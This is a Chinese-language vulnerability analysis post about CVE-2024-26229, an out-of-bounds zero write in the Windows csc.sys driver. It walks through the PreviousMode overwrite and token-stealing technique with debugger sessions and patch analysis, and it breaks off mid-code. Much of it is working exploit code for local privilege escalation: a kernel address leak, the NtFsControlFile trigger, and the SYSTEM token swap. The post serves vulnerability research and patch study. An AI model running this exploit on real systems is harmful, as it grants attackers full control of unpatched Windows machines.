首页
社区
课程
招聘
[原创] CVE-2024-26229 Windows CSC 本地内核提权漏洞分析
发表于: 2024-6-17 14:37 7699

[原创] CVE-2024-26229 Windows CSC 本地内核提权漏洞分析

2024-6-17 14:37
7699

前言

该漏洞为windows csc.sys驱动越界写导致的本地内核提权漏洞。

越界写零提权原理

简单来说

我们利用漏洞进行越界写0修改KTHREAD结构中的PreviousMode字段,使其为KernelMode。这样,后续的写操作不会进行权限检查,从而允许我们修改内核数据结构,实现任意地址写入。
通过任意地址写入操作,我们可以将当前进程的Token字段替换为系统进程的Token字段。这样当前进程就能够获得系统进程的权限,从而实现提权。
image.png

详细展开

UserMode 与 KernelMode

PreviousMode 通常是 KTHREAD 结构的一部分,在 Windows 内核的头文件中,PreviousMode 通常被定义为 MODE 枚举类型,数据结构如下图所示:
image.png
在 Windows 内核中,PreviousMode用于标识线程最后一次执行的模式。这个字段有两个值:

  1. PreviousMode = UserMode (1)
  • 当线程从用户模式调用系统服务(如通过 NtZw 前缀的函数)进入内核模式时,PreviousMode 被设置为 UserMode。这表明调用来源于用户空间,并且是在用户态下发起的系统调用。在用户模式下,应用程序受到更多的限制和安全检查。
  1. PreviousMode = KernelMode (0)
  • 当线程已经在内核模式下执行,并且调用内核模式的例程或函数时,PreviousMode 保持为 KernelMode。这表明操作是在内核空间内部进行的。
  • 在内核模式下,代码具有完全的系统访问权限,也就是我们提权的关键。

绕过检查实现任意地址写入

PreviousMode 值设置为 0 后,NtReadVirtualMemory()NtWriteVirtualMemory()NtAllocateVirtualMemory() 等函数可以被滥用来读取、写入、分配内核内存,因为地址验证检查将被跳过。逆向ntoskrnl.exe可以获取函数原型,下面举两个例子来了解判断的运行流程:
NtWriteVirtualMemory()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
__int64 __fastcall NtWriteVirtualMemory(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, __int64 BufferSize, __int64 *NumberOfBytesWritten)
{
  pCurrentThread = KeGetCurrentThread();
  // 获取当前线程的模式
  PreviousMode = pCurrentThread->PreviousMode;
   
  // 进行 PreviousMode 检查
  if ( PreviousMode )
  {
    EndAddress = BaseAddress + BufferSize;
    if ( BaseAddress + BufferSize  lt; BaseAddress )
      return STATUS_ACCESS_VIOLATION;
    BufferEnd = Buffer + BufferSize;
    if ( BufferEnd  MmHighestUserAddress || BufferEnd > MmHighestUserAddress )
      return STATUS_ACCESS_VIOLATION;
    if ( NumberOfBytesWritten )
    {
      NumberOfBytesWritten_ = NumberOfBytesWritten;
      if ( NumberOfBytesWritten >= MmUserProbeAddress )
        NumberOfBytesWritten_ = MmUserProbeAddress;
      *NumberOfBytesWritten_ = *NumberOfBytesWritten_;
    }
  }
...

NtAllocateVirtualMemory()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
NTSTATUS __stdcall NtAllocateVirtualMemory(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect)
{
    // 获取当前线程的模式
    char PreviousMode = KeGetCurrentThread()->PreviousMode;
 
    // 如果是用户模式,验证指针是否超出用户模式地址空间
    if (PreviousMode && ((uintptr_t)BaseAddress >= 0x7FFFFFFF0000 || (uintptr_t)RegionSize >= 0x7FFFFFFF0000)) {
        return STATUS_ACCESS_VIOLATION;
    }
 
    // 检查非法的分配类型
    if ((AllocationType & 0x44000) != 0) {
        return STATUS_INVALID_PARAMETER;
    }
 
    // 根据传入参数调用内核函数进行实际的内存分配
    NTSTATUS status = MiAllocateVirtualMemoryCommon(
        ProcessHandle,
        BaseAddress,
        ZeroBits,
        RegionSize,
        AllocationType,
        Protect,
        PreviousMode);
 
    return status;
}

当一个用户模式应用程序调用本地系统服务例程的 Nt 或 Zw 版本时,该例程总是将它接收到的参数视为来自一个不受信任的用户模式源的值。该例程会在使用这些参数之前彻底验证参数值,探测任何由调用者提供的缓冲区,以验证这些缓冲区是否位于有效的用户模式内存中,并且是否对齐正确。
参考:Using Nt and Zw Versions of the Native System Services Routines
举一个例子,如果一个 NtXxx 例程的参数包括一个输入或输出缓冲区,并且如果 PreviousMode = UserMode,那么该例程会调用 ProbeForRead 或 ProbeForWrite 例程来验证缓冲区。如果缓冲区是分配在系统内存而不是用户模式内存中,ProbeForXxx 例程会引发一个异常,并且 NtXxx 例程会返回 STATUS_ACCESS_VIOLATION 错误代码。
参考:PreviousMode
所以可以看到当 PreviousMode 为0时检查将被绕过,可以直接使用NtWriteVirtualMemory函数进行任意地址写入操作。

将当前进程 Token 替换为 System Token

替换流程:

  1. 获取当前进程的 EPROCESS 结构的地址。
  2. 获取PID为4的进程的EPROCESS 地址。(PID的值为4,意味着该进程为system进程)
  3. 将系统进程的 Token 复制到当前进程的Token中,从而提升当前进程的权限。

什么是 EPROCESS 结构?
EPROCESS结构体是Windows操作系统内核中用于表示进程的关键数据结构,它包含了进程相关的信息和指向其他相关结构体数据结构的指针,在这里我们需要通过EPROCESS地址来定位到token地址。
这里使用test01.exe进行调试分析:

1
2
3
4
5
1: kd> !process 0 0 test01.exe
PROCESS ffffcb8381cf3080
    SessionId: 1  Cid: 164c    Peb: 3200cac000  ParentCid: 114c
    DirBase: 1e2fb5002  ObjectTable: ffff81028a337e80  HandleCount:  41.
    Image: test01.exe

Token的值在不同windows版本偏移不相同,此处为0x4b8
image.png所以,当前 EPROCESS 结构的地址是 ffffcb8381cf3080,Token 的地址是ffffcb8381cf3080 + 0x4b8
查找指定进程的token地址的代码逻辑(以获取当前进程token地址举例):

  1. 打开当前进程并获取其句柄
  2. 获取系统中所有句柄的信息(使用NtQuerySystemInformation结合下面的遍历实现内核地址泄露)
  3. 遍历获取到的所有句柄的信息,寻找根据PID和句柄匹配的内核对象地址(内核对象地址是实际的内核空间地址,而句柄是用户模式下的索引)
  4. 根据偏移获取token地址

因此我们通过句柄可以间接找到对应的内核对象地址,对于进程句柄这个地址就是 EPROCESS 地址。有了EPROCESS地址,我们就可以通过偏移获取当前进程的token地址。获取指定PID的token地址也是一样的,这样当我们可以进行任意地址写入后就可以直接将system token写到我们指定进程的token中了。

漏洞分析

csc.sys 简介

csc.sys驱动是一个处理客户端缓存(Client-Side Caching)和提供离线文件功能的系统驱动(windows默认启用)。csc.sys允许用户在断网的情况下继续访问和操作网络文件,当用户在没有网络连接的情况下对这些文件进行更改时,这些更改首先影响的是本地缓存的副本;一旦网络连接恢复,CSC.sys 会负责将这些本地更改同步回网络位置,确保网络上的数据与本地的副本保持一致。

分析漏洞函数

此处使用 csc_10.0.19041.3636.syscsc_10.0.19041.4291_KB5036892.sys 来进行分析。
对比补丁发现主要针对CscDevFcbXXXControlFile进行了修改:
image.png
csc!CscDevFcbXXXControlFile是什么?这个函数是如何进行调用?
从该函数命名我们可以得知Fcb(File Control Block)是与文件系统的操作相关的,代码的核心逻辑通过逆向可知是文件系统接收FSCTL code(文件系统控制码)进行操作,windows发送FSCTL code使用的是NtFsControlFile函数。
image.png
NtFsControlFile 是 Windows 操作系统中一个提供文件系统控制操作的内核API,其函数原型如下:

1
2
3
4
5
6
7
8
9
10
11
12
NTSTATUS NtFsControlFile(
  HANDLE FileHandle,                 // 要操作的文件句柄
  HANDLE Event,                      // 指定一个事件,或NULL
  PIO_APC_ROUTINE ApcRoutine,        // 异步操作的APC回调,或NULL
  PVOID ApcContext,                  // APC回调的上下文参数
  PIO_STATUS_BLOCK IoStatusBlock,    // 操作结果状态块
  ULONG FsControlCode,               // 文件系统控制操作的代码
  PVOID InputBuffer,                 // 输入数据缓冲区,根据控制代码而定
  ULONG InputBufferLength,           // 输入数据的长度
  PVOID OutputBuffer,                // 输出数据缓冲区,根据控制代码而定
  ULONG OutputBufferLength           // 输出数据的长度
);

从函数原型中得知对应的FSCTL0x001401a3是通过NtFsControlFileFsControlCode参数进行传递的。
CscDevFcbXXXControlFile()当传递对应的 FSCTL code 符合条件后进入代码核心操作,我们观察下面操作是如何进行越界写0的:

1
2
3
4
5
6
7
if ( *(_DWORD *)(a1 + 0x20C) == 0x1401A3 )
{
  v10 = *(_QWORD *)(a1 + 0x218);
  v4 = 0;
  *(_QWORD *)(a1 + 0xB8) = 0i64;
  *(_QWORD *)(v10 + 0x18) = 0i64; // 漏洞利用
}

可以看到CscDevFcbXXXControlFile()有两处写0操作:

  1. *(_QWORD *)(a1 + 0xB8) = 0;
  2. *(_QWORD *)(*(_QWORD *)(a1 + 0x218) + 0x18) = 0;

传入的参数a1是什么?
image.png
当我们传递NtFsControlFile的函数参数进行调用时,多个函数会根据参数进行处理,最后传给csc!CscDevFcbXXXControlFile的参数a1并非是我们传入的线程内核地址,而且是一个指向数据结构的指针,数据结构为:

1
2
3
4
5
CscDevFcbXXXControlFile Param Address:
    +0x0038 UpdateAndCaptureConnectionState Input Data Structure
    +0x020C FSCTL code
    +0x0218 InputBuffer (NTFsControlFile Param Address)
    +0x0228 InputBufferLength

此处参数a1并非我们可控的,所以第一个写0处不可控;但是a1+0x218则是我们通过NTFsControlFile传入的地址,此处导致我们越界写0可控。
因此我们此处构造的pNtFsControlFile()函数代码如下所示,其中 PreviousMode 的偏移为0x232,减去0x18来抵消掉等式中的增加0x18

1
2
3
4
5
6
7
8
9
10
11
status = pNtFsControlFile(
    handle,
    NULL,
    NULL,
    NULL,
    &iosb,
    0x001401a3,
    (void*)(Curthread + 0x232 - 0x18), // 漏洞利用
    0,
    NULL,
    0);

调试漏洞函数

PreviousMode 越界写零

  • 函数下断点
1
2
3
4
5
6
7
8
9
1: kd> !sym noisy
1: kd> !reload
1: kd> lm t n
1: kd> .reload /f csc.sys
1: kd> bp csc!CscDevFcbXXXControlFile
1: kd> g
Breakpoint 0 hit
csc!CscDevFcbXXXControlFile:
fffff800`79869e30 4c8bdc          mov     r11,rsp
  • 获取进程的EPROCESS结构的内核地址
1
2
3
4
5
1: kd> !process 0 0 CVE-2024-26229-DEBUG.exe
PROCESS ffffcb8381e8d080
    SessionId: 1  Cid: 0b74    Peb: d4d6503000  ParentCid: 114c
    DirBase: 1bf522002  ObjectTable: ffff81028a34b180  HandleCount:  37.
    Image: CVE-2024-26229-EXP.exe
  • 查看详细信息,获取线程内核地址
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
1: kd> !process ffffcb8381e8d080 7
PROCESS ffffcb8381e8d080
    SessionId: 1  Cid: 04c8    Peb: 96def11000  ParentCid: 114c
    DirBase: 1aba81002  ObjectTable: ffff81028a345c80  HandleCount:  37.
    Image: CVE-2024-26229-EXP.exe
    VadRoot ffffcb83831a8c90 Vads 28 Clone 0 Private 1062. Modified 0. Locked 0.
    DeviceMap ffff810284057490
    Token                             ffff810287cb9870
    ElapsedTime                       00:00:00.141
    UserTime                          00:00:00.000
    KernelTime                        00:00:00.000
    QuotaPoolUsage[PagedPool]         22504
    QuotaPoolUsage[NonPagedPool]      4072
    Working Set Sizes (now,min,max)  (1669, 50, 345) (6676KB, 200KB, 1380KB)
    PeakWorkingSetSize                1630
    VirtualSize                       4148 Mb
    PeakVirtualSize                   4148 Mb
    PageFaultCount                    2139
    MemoryPriority                    BACKGROUND
    BasePriority                      8
    CommitCharge                      1533
    Job                               ffffcb8380fe9060
 
        THREAD ffffcb837fc6e080  Cid 04c8.0160  Teb: 00000096def12000 Win32Thread: 0000000000000000 RUNNING on processor 1
        IRP List:
            ffffcb8381150460: (0006,0430) Flags: 00060800  Mdl: 00000000
        Not impersonating
        DeviceMap                 ffff810284057490
        Owning Process            ffffcb8381e8d080       Image:         CVE-2024-26229-EXP.exe
        Attached Process          N/A            Image:         N/A
        Wait Start TickCount      1523195        Ticks: 0
        Context Switch Count      138            IdealProcessor: 0            
        UserTime                  00:00:00.000
        KernelTime                00:00:00.046
        Win32 Start Address 0x00007ff767d91810
        Stack Init ffffc90a255e7c90 Current ffffc90a255e7530
        Base ffffc90a255e8000 Limit ffffc90a255e2000 Call 0000000000000000
        Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
  • _KTHREAD结构中查看PreviousMode字段
1
2
3
4
5
6
7
8
9
10
1: kd> dt nt!_KTHREAD ffffcb837fc6e080
    // 省略若干字段
   +0x220 Process          : 0xffffcb83`81e8d080 _KPROCESS
   +0x228 UserAffinity     : _GROUP_AFFINITY
   +0x228 UserAffinityFill : [10]  "???"
   +0x232 PreviousMode     : 1 ''
   +0x233 BasePriority     : 8 ''
   +0x234 PriorityDecrement : 0 ''
   +0x234 ForegroundBoost  : 0y0000
   // 省略若干字段
  • 触发漏洞进行越界写0
1
2
3
4
5
6
7
8
9
10
dt nt!_KTHREAD ffffcb837fc6e080
    // 省略若干字段
   +0x220 Process          : 0xffffcb83`81e8d080 _KPROCESS
   +0x228 UserAffinity     : _GROUP_AFFINITY
   +0x228 UserAffinityFill : [10]  "???"
   +0x232 PreviousMode     : 0 '' // 被修改
   +0x233 BasePriority     : 8 ''
   +0x234 PriorityDecrement : 0 ''
   +0x234 ForegroundBoost  : 0y0000
   // 省略若干字段

可以看到未触发漏洞前PreviousMode为1,在触发漏洞后则被越界写为0。

NtFsControlFile 函数调用

  • 仅对目标程序下断点调试 NtFsControlFile
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
0: kd> x nt!*NtFsControlFile*
fffff804`756e6f60 nt!NtFsControlFile (NtFsControlFile)
1: kd> !process 0 0 CVE-2024-26229-DEBUG.exe
PROCESS ffff988f7520e080
    SessionId: 1  Cid: 0568    Peb: 6c0bc49000  ParentCid: 10f4
    DirBase: 220cf5002  ObjectTable: ffffaa006bd91980  HandleCount:  44.
    Image: CVE-2024-26229-DEBUG.exe
 
// 获取目标调用线程EPROCESS地址(0xffff988f740b0080)
1: kd> !process ffff988f7520e080 7
     
// 过滤其他程序对NtFsControlFile的调用
1: kd> bp nt!NtFsControlFile ".if (@$proc != 0xffff988f740b0080) {gc;}"
1: kd> r
rax=fffff804756e6f60 rbx=ffff988f73f5d080 rcx=000000000000008c
rdx=0000000000000000 rsi=000000c4490ff678 rdi=ffff95020867daa8
rip=fffff804756e6f60 rsp=ffff95020867da88 rbp=ffff95020867db80
 r8=0000000000000000  r9=0000000000000000 r10=fffff804756e6f60
r11=fffff804753ef320 r12=0000000000000000 r13=0000000000000000
r14=ffff988f7065c040 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc

前四个参数通过寄存器 RCX、RDX、R8、和 R9 传递,剩余的参数则通过栈传递:

  • RCX: 000000000000008c 文件句柄
  • RDX: 0000000000000000 没有使用事件
  • R8: 0000000000000000 没有指定APC函数
  • R9: 0000000000000000 没有指定APC上下文
1
2
3
4
5
6
7
8
9
10
1: kd> dps rsp L9
ffff9502`0867da88  fffff804`753ef375 nt!KiSystemServiceCopyEnd+0x25
ffff9502`0867da90  00000000`000000a8
ffff9502`0867da98  00000000`00000000
ffff9502`0867daa0  00000000`00000000
ffff9502`0867daa8  ffff988f`74aaf080
ffff9502`0867dab0  000000c4`490ff728
ffff9502`0867dab8  00000000`001401a3
ffff9502`0867dac0  ffff988f`73f5d29a
ffff9502`0867dac8  00000000`00000000
  • IoStatusBlock:ffff95020867daa8 -> ffff988f74aaf080
  • FsControlCode:ffff95020867dab8值为0x001401a3
  • InputBuffer:ffff95020867dac0->ffff988f73f5d29a
  • InputBufferLength:ffff95020867dac8值为 0

当前线程地址为ffff988f73f5d080

1
0xffff988f73f5d29a = 0xffff988f73f5d080 + 0x232 -0x18

可以看到上面函数的传参均符合预期。

CscDevFcbXXXControlFile 函数调用

  • 函数下断点
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
1: kd> bp csc!CscDevFcbXXXControlFile
1: kd> g
Breakpoint 1 hit
csc!CscDevFcbXXXControlFile:
fffff804`7af69e30 4c8bdc          mov     r11,rsp
1: kd> r
rax=fffff8047af69e30 rbx=ffff988f7450fc80 rcx=ffff988f7450fc80
rdx=ffff988f74f2b820 rsi=ffff988f74f2b820 rdi=ffff988f712a6030
rip=fffff8047af69e30 rsp=ffff95020867d2b8 rbp=ffff988f74f2b820
 r8=0000000000000000  r9=ffff988f74f2b980 r10=fffff8047530eba0
r11=ffff95020867d320 r12=fffff8047aeab000 r13=fffff8047aea44f0
r14=000000000000ec23 r15=ffff988f74f2b980
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040246
csc!CscDevFcbXXXControlFile:
fffff804`7af69e30 4c8bdc          mov     r11,rsp
 
// FSCTL Code
1: kd> dq ffff988f7450fc80+0x20C
ffff988f`7450fe8c  00000000`001401a3 73f5d29a`00000000
ffff988f`7450fe9c  00000000`ffff988f 00000000`00000000
ffff988f`7450feac  00000000`00000000 00000000`00000000
ffff988f`7450febc  00000000`00000000 00000000`00000000
ffff988f`7450fecc  00000000`00000000 00000000`00000000
ffff988f`7450fedc  00000000`00000000 00000000`00000000
ffff988f`7450feec  00000000`00000000 00000000`00000000
ffff988f`7450fefc  00000000`00000000 00000000`00000000
 
// NTFsControlFile Param Address
1: kd> dq ffff988f7450fc80+0x218
ffff988f`7450fe98  ffff988f`73f5d29a 00000000`00000000
ffff988f`7450fea8  00000000`00000000 00000000`00000000
ffff988f`7450feb8  00000000`00000000 00000000`00000000
ffff988f`7450fec8  00000000`00000000 00000000`00000000
ffff988f`7450fed8  00000000`00000000 00000000`00000000
ffff988f`7450fee8  00000000`00000000 00000000`00000000
ffff988f`7450fef8  00000000`00000000 00000000`00000000
ffff988f`7450ff08  00000000`00000000 00000000`00000000

函数传入参数为ffff988f7450fc80,对应传入参数a1,分析出指针指向的数据结构:

1
2
3
4
CscDevFcbXXXControlFile Param Address:
    +0x0038 UpdateAndCaptureConnectionState Input Data Structure
    +0x020C FSCTL code
    +0x0218 NTFsControlFile Param Address

CscUpdateAndCaptureConnectionStateEx 函数调用

该函数用于更新和捕获连接状态,其中对判断函数中变量的改变起到了关键作用。

  • 函数下断点
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
1: kd> bp csc!CscUpdateAndCaptureConnectionStateEx
1: kd> g
Breakpoint 2 hit
csc!CscUpdateAndCaptureConnectionStateEx:
fffff804`7af02970 48895c2410      mov     qword ptr [rsp+10h],rbx
1: kd> r
rax=ffff95020867d288 rbx=ffff988f7450fc80 rcx=fffff8047aeab3c0
rdx=ffffaa0069eadda0 rsi=0000000000000000 rdi=00000000c0000010
rip=fffff8047af02970 rsp=ffff95020867d218 rbp=0000000000000001
 r8=ffff988f7450fc80  r9=0000000000000000 r10=fffff8047530eba0
r11=ffff95020867d2b8 r12=fffff8047aeab000 r13=fffff8047aea44f0
r14=ffffaa0069eadda0 r15=fffff8047af37000
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040246
csc!CscUpdateAndCaptureConnectionStateEx:
fffff804`7af02970 48895c2410      mov     qword ptr [rsp+10h],rbx ss:0018:ffff9502`0867d228=0000000000000000

函数第一个参数为指向数据结构的一个指针,对应CscDevFcbXXXControlFile Param + 0x0038

1
2
3
4
5
6
7
8
9
1: kd> dq ffff988f7450fc80+0x38
ffff988f`7450fcb8  fffff804`7aeab3c0 ffffaa00`6bd216f0
ffff988f`7450fcc8  ffffaa00`69eadda0 ffff988f`712a6030
ffff988f`7450fcd8  ffff988f`73f5d080 ffff988f`73f5d080
ffff988f`7450fce8  00000000`00000000 00000000`00000000
ffff988f`7450fcf8  00000000`00001001 00000000`00000000
ffff988f`7450fd08  00000000`00000000 00000000`00000000
ffff988f`7450fd18  00000000`00000000 00000000`00000000
ffff988f`7450fd28  00000000`00020000 00000000`00000000

其中函数参数v14初始化为0,此处传递v14的地址进行运算,函数的调用中后续会使用该变量进行判断,为该函数的第5个参数:

1
2
3
4
5
6
7
CscUpdateAndCaptureConnectionStateEx(
  (unsigned int)*(_QWORD *)(a1 + 0x38),
  (unsigned int)v2,
  (unsigned int)a1,
  0,
  (__int64)&v14,
  1);

可以看到 rsp 寄存器的值为ffff95020867d218。在堆栈中第五个参数的地址存储在rsp + 0x28位置,即ffff95020867d240。对应值为ffff95020867d288`,其当前指向地址值为0:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
1: kd> dps rsp L9
ffff9502`0867d218  fffff804`7af69f21 csc!CscDevFcbXXXControlFile+0xf1
ffff9502`0867d220  00000000`00000000
ffff9502`0867d228  00000000`00000000
ffff9502`0867d230  00000000`00000000
ffff9502`0867d238  fffff804`7aecfc6b rdbss!RdbssStatisticsEntryArrayFindOrCreateSecondaryInstance+0x5f
ffff9502`0867d240  ffff9502`0867d288
ffff9502`0867d248  00000000`00000001
ffff9502`0867d250  00000000`00000000
ffff9502`0867d258  00000000`00000000
 
1: kd> dq ffff95020867d288
ffff9502`0867d288  00000000`00000000 00000000`00000000
ffff9502`0867d298  ffff076a`ad991417 ffff988f`74f2b980
ffff9502`0867d2a8  00000000`0000ec23 ffff988f`712a6030
ffff9502`0867d2b8  fffff804`7aebb329 ffff988f`7450fc80
ffff9502`0867d2c8  ffff988f`7450fc80 ffff988f`74f2b820
ffff9502`0867d2d8  ffff988f`74f2b820 ffff988f`7450fc80
ffff9502`0867d2e8  fffff804`7aebb1d3 ffff988f`74f2b980
ffff9502`0867d2f8  00000000`001401a3 00000000`00000000

在运算结束后,其值发生改变,则因此进入了我们的核心运算逻辑:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
// 跳转到 CscUpdateAndCaptureConnectionStateEx 运行结束的状态
1: kd> gu
csc!CscDevFcbXXXControlFile+0xf1:
fffff804`7af69f21 f644246810      test    byte ptr [rsp+68h],10h
 
1: kd> dq ffff95020867d288
ffff9502`0867d288  00000000`00004010 00000000`00000000
ffff9502`0867d298  ffff076a`ad991417 ffff988f`74f2b980
ffff9502`0867d2a8  00000000`0000ec23 ffff988f`712a6030
ffff9502`0867d2b8  fffff804`7aebb329 ffff988f`7450fc80
ffff9502`0867d2c8  ffff988f`7450fc80 ffff988f`74f2b820
ffff9502`0867d2d8  ffff988f`74f2b820 ffff988f`7450fc80
ffff9502`0867d2e8  fffff804`7aebb1d3 ffff988f`74f2b980
ffff9502`0867d2f8  00000000`001401a3 00000000`00000000

漏洞利用

经过上面的分析,我们下面实现漏洞利用代码了。

打开驱动设备获取句柄

image.png

1
2
3
pRtlInitUnicodeString(&objectName, L"\\Device\\Mup\\;Csc\\.\\.");
InitializeObjectAttributes(&objectAttr, &objectName, 0, NULL, NULL);
status = pNtCreateFile(&handle, SYNCHRONIZE, &objectAttr, &iosb, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, FILE_CREATE_TREE_CONNECTION, NULL, 0);

构造获取目标进程内核对象地址函数

此处使用NtQuerySystemInformation来进行内核地址泄露

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
int GetObjPtr(_Out_ PULONG64 ppObjAddr, _In_ ULONG ulPid, _In_ HANDLE handle)
 
{
    int Ret = -1;
    PSYSTEM_HANDLE_INFORMATION pHandleInfo = 0;
    ULONG ulBytes = 0;
    NTSTATUS Status = STATUS_SUCCESS;
 
    while ((Status = pNtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, pHandleInfo, ulBytes, &ulBytes)) == 0xC0000004L)
    {
        if (pHandleInfo != NULL)
            pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pHandleInfo, (size_t)2 * ulBytes);
        else
            pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (size_t)2 * ulBytes);
    }
 
    if (Status != NULL)
    {
        Ret = Status;
        goto done;
    }
 
    // 遍历 pHandleInfo 中的所有句柄,寻找与给定的 PID 和句柄值匹配的条目
    for (ULONG i = 0; i < pHandleInfo->NumberOfHandles; i++)
    {
        if ((pHandleInfo->Handles[i].UniqueProcessId == ulPid) && (pHandleInfo->Handles[i].HandleValue == (unsigned short)handle))
        {
            *ppObjAddr = (ULONG64)pHandleInfo->Handles[i].Object;
            Ret = 0;
            break;
        }
    }
 
done:
    return Ret;
}

该函数用户获取当前进程内核对象地址和system进程内核对象地址:

1
2
GetObjPtr(&Sysproc, 4, 4);
GetObjPtr(&Curproc, GetCurrentProcessId(), hCurproc);

其中EPROCESS的token偏移在windows不同版本可能有所不同,这里根据漏洞涉及范围进行了统计:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
VersionOffset versionOffsets[] = {
    // From Build Version
    {"6.0.60", 0x168},    // Windows Server 2008 for x64-based Systems Service Pack 2
    {"6.1.76", 0x208},    // Windows Server 2008 R2 for x64-based Systems Service Pack 1
    {"6.2.92", 0x348},    // Windows Server 2012
    {"6.3.96", 0x348},    // Windows Server 2012 R2
    {"10.0.19", 0x4B8},   // win10 Build 190x
    {"10.0.18", 0x360},   // win10 Build 180x
    {"10.0.17", 0x358},   // win10 Build 170x
    {"10.0.16", 0x358},   // win10 Build 160x
    {"10.0.15", 0x358},   // win10 Build 150x
    {"10.0.14", 0x358},   // win10 Build 140x
    {"10.0.14", 0x358},   // Duplicate for win10 Build 100x
    {"10.0.22", 0x4B8},   // win11
    {"10.0.25", 0x4B8},   // Windows Server 2022
};

可以使用未公开函数RtlGetNtVersionNumbers来获取版本号再设置偏移:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
void SystemVersion() {
    DWORD dwMajorVer, dwMinorVer, dwBuildNumber = 0;
    FRtlGetNtVersionNumbers fRtlGetNtVersionNumbers = (FRtlGetNtVersionNumbers)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetNtVersionNumbers");
    if (fRtlGetNtVersionNumbers) {
        fRtlGetNtVersionNumbers(&dwMajorVer, &dwMinorVer, &dwBuildNumber);
        dwBuildNumber &= 0xFFFF;
        char versionString[50];
        sprintf(versionString, "%lu.%lu.%lu", dwMajorVer, dwMinorVer, dwBuildNumber);
 
#if DEBUG
        printf("Version: %s\n", versionString);
#endif
        size_t i;
        for (i = 0; i < versionOffsetsSize; i++) {
            // Check if the version string starts with the pattern defined in versionOffsets
            if (strncmp(versionString, versionOffsets[i].version, strlen(versionOffsets[i].version)) == 0) {
                EPROCESS_TOKEN_OFFSET = versionOffsets[i].offset;
#if DEBUG
                printf("The version matches %s with offset 0x%lx\n", versionString, EPROCESS_TOKEN_OFFSET);
#endif
                break;
            }
        }
 
        if (i == versionOffsetsSize) {
            printf("The version does not match any predefined offsets\n");
        }
    }
    else {
        printf("Failed to retrieve version numbers.\n");
    }
}

调用NtFsControlFile触发漏洞越界写零

1
2
3
4
5
6
7
8
9
10
11
status = pNtFsControlFile(
    handle,
    NULL,
    NULL,
    NULL,
    &iosb,
    CSC_DEV_FCB_XXX_CONTROL_FILE,
    (void*)(Curthread + KTHREAD_PREVIOUS_MODE_OFFSET - 0x18),
    0,
    NULL,
    0);

修改当前进程令牌

1
2
3
4
5
6
7
8
9
10
11
12
13
NTSTATUS Write64(_In_ uintptr_t* Dst, _In_ uintptr_t* Src, _In_ size_t Size)
{
    NTSTATUS Status = 0;
    size_t cbNumOfBytesWrite = 0;
 
    Status = pNtWriteVirtualMemory(GetCurrentProcess(), Dst, Src, Size, &cbNumOfBytesWrite);
    if (!NT_SUCCESS(Status))
        return -1;
 
    return Status;
}
// 替换当前进程令牌为系统令牌
Write64(Curproc + EPROCESS_TOKEN_OFFSET, Sysproc + EPROCESS_TOKEN_OFFSET, 0x8);

恢复 PreviousMode 为 UserMode

如果不进行此操作则会触发BSOD:

1
2
// 恢复 PreviousMode 为 UserMode
Write64(Curthread + KTHREAD_PREVIOUS_MODE_OFFSET, &mode, 0x1);

执行高权限命令

1
system("cmd.exe");

成功提权。

补丁分析

分析的补丁为KB5036892,该补丁进行的调整:

  • 新增了17个函数
  • 1个函数进行代码调整:CscDevFcbXXXControlFile()
    • 增加Feature_1543900478__private_IsEnabled()
    • 增加ProbeForWrite()

CscDevFcbXXXControlFile 函数变动

查看该函数变动:
image.png
可以看到在FSCTL code等于0x1401a3后,新增了Feature_1543900478__private_IsEnabled功能判断,该函数是微软补丁用来适配未打补丁的系统的,因此打了补丁的系统会让该函数返回值为1,进入else判断中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
if (*(int *)(param_1 + 0x20c) == 0x1401a3) {
  uVar4 = Feature_1543900478__private_IsEnabled();
  if (uVar4 == 0) {
    *(undefined8 *)(param_1 + 0xb8) = 0;
    *(undefined8 *)(*(longlong *)(param_1 + 0x218) + 0x18) = 0;
    uVar5 = uVar6;
    uVar3 = 0;
  }
  else {
    *(undefined8 *)(param_1 + 0xb8) = 0;
    if (*(uint *)(param_1 + 0x228) < 0x24) {
      uVar5 = uVar6;
      uVar3 = 0x23;
    }
    else {
      lVar2 = *(longlong *)(param_1 + 0x218);
      if (*(char *)(*(longlong *)(param_1 + 0x28) + 0x40) != '\0') {
        ProbeForWrite(lVar2,*(uint *)(param_1 + 0x228),4);
      }
      if (*(int *)(lVar2 + 4) == 6) {
        *(undefined8 *)(lVar2 + 0x18) = 0;
        uVar5 = uVar6;
        uVar3 = 0;
      }
      else {
        uVar3 = 0xd;
